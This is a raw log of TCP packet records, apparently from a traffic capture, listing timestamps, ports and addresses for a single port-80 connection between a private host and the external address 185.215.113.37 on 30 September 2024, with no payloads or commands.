Sep 30, 2024 07:08:01.498147011 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.498147011 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.498158932 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.498169899 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.498172045 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.498183966 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.498195887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.498197079 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.498207092 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.498239994 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.498264074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.498275042 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.498282909 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.498292923 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.498302937 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.498306036 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.498315096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.498332024 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.498337030 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.498362064 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.498369932 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.498461962 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.498472929 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.498481035 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.498491049 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.498502016 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.498503923 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.498512030 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.498518944 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.498522997 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.498532057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.498547077 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.498559952 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.498570919 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.538887024 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.538924932 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.538938046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.538958073 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.538985014 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.538985014 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.538985014 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.538999081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.539010048 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.539024115 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.539030075 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.539036989 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.539038897 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.539047956 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.539060116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.539061069 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.539091110 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.539103985 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.539132118 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.539144039 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.539155960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.539167881 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.539176941 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.539185047 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.539211035 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.539237022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.539249897 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.539259911 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.539274931 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.539280891 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.539304972 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.539308071 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.539319038 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.539333105 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.539361000 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.539401054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.539413929 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.539424896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.539455891 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.539464951 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.539475918 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.539479971 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.539486885 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.539496899 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.539511919 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.539524078 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.539541006 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.539554119 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.539563894 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.539576054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.539582968 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.539608955 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.539617062 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.539661884 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.539683104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.539694071 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.539705038 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.539716005 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.539726973 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.539735079 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.539751053 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.539774895 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.540730000 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.540740967 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.540750980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.540761948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.540772915 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.540787935 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.540807009 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.540818930 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.540831089 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.540858030 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.540879965 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.583036900 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.583048105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.583059072 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.583100080 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.583105087 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.583117008 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.583127022 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.583127975 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.583148003 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.583152056 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.583161116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.583177090 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.583178043 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.583204031 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.583219051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.583226919 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.583230019 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.583240986 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.583252907 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.583261013 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.583278894 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.583287954 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.583312988 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.583352089 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.583389997 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.583395004 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.583401918 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.583429098 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.583432913 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.583439112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.583451033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.583473921 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.583482981 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.583493948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.583503962 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.583504915 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.583515882 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.583527088 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.583543062 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.583564997 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.583636045 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.583646059 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.583656073 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.583678007 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.583702087 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.583755016 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.583770990 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.583781004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.583791018 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.583798885 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.583801985 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.583831072 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.583831072 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.583842039 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.583842993 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.583854914 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.583868980 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.583882093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.583884001 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.583894014 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.583898067 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.583925009 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.583939075 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.583949089 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.583957911 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.583983898 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.583998919 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.584054947 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.584065914 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.584101915 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.584106922 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.584114075 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.584125996 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.584145069 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.584155083 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.584166050 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.584166050 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.584177971 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.584187984 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.584192038 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.584220886 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.584258080 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.584270000 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.584279060 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.584291935 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.584304094 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.584305048 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.584322929 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.584348917 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.584388971 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.584399939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.584409952 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.584419966 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.584431887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.584439039 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.584441900 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.584456921 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.584471941 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.584494114 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.584542036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.584553003 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.584563017 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.584573030 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.584587097 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.584598064 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.584599018 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.584625006 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.584639072 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.584640980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.584654093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.584682941 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.584693909 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.584705114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.584714890 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.584738016 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.584752083 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.584821939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.584832907 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.584842920 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.584853888 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.584865093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.584867954 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.584877014 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.584902048 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.584917068 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.584937096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.584948063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.584979057 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.585012913 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.585024118 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.585032940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.585052013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.585057020 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.585072041 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.585094929 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.625720978 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.625735998 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.625746965 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.625812054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.625813961 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.625823975 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.625835896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.625849009 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.625860929 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.625866890 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.625884056 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.625900984 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.625932932 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.625945091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.625960112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.625971079 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.625983000 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.625999928 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.626012087 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.626023054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.626029015 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.626050949 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.626055002 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.626064062 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.626091003 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.626117945 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.626146078 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.626157045 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.626167059 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.626177073 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.626187086 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.626205921 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.626207113 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.626218081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.626233101 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.626235008 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.626262903 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.626290083 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.626293898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.626306057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.626315117 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.626337051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.626341105 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.626348019 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.626358986 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.626400948 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.627353907 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.627363920 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.627370119 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.627413988 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.627413988 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.627425909 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.627437115 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.627440929 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.627465010 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.627470970 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.627476931 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.627496004 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.627526045 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.669933081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.669945002 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.669955015 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.670008898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.670017958 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.670027971 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.670037985 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.670082092 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.670090914 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.670099974 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.670109987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.670120001 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.670156956 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.670173883 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.670186043 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.670188904 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.670218945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.670224905 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.670233011 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.670252085 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.670268059 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.670296907 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.670310974 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.670320034 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.670330048 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.670339108 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.670348883 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:01.670355082 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.670372009 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.670409918 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.670409918 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:01.670625925 CEST	80	49730	185.215.113.37	192.168.2.4
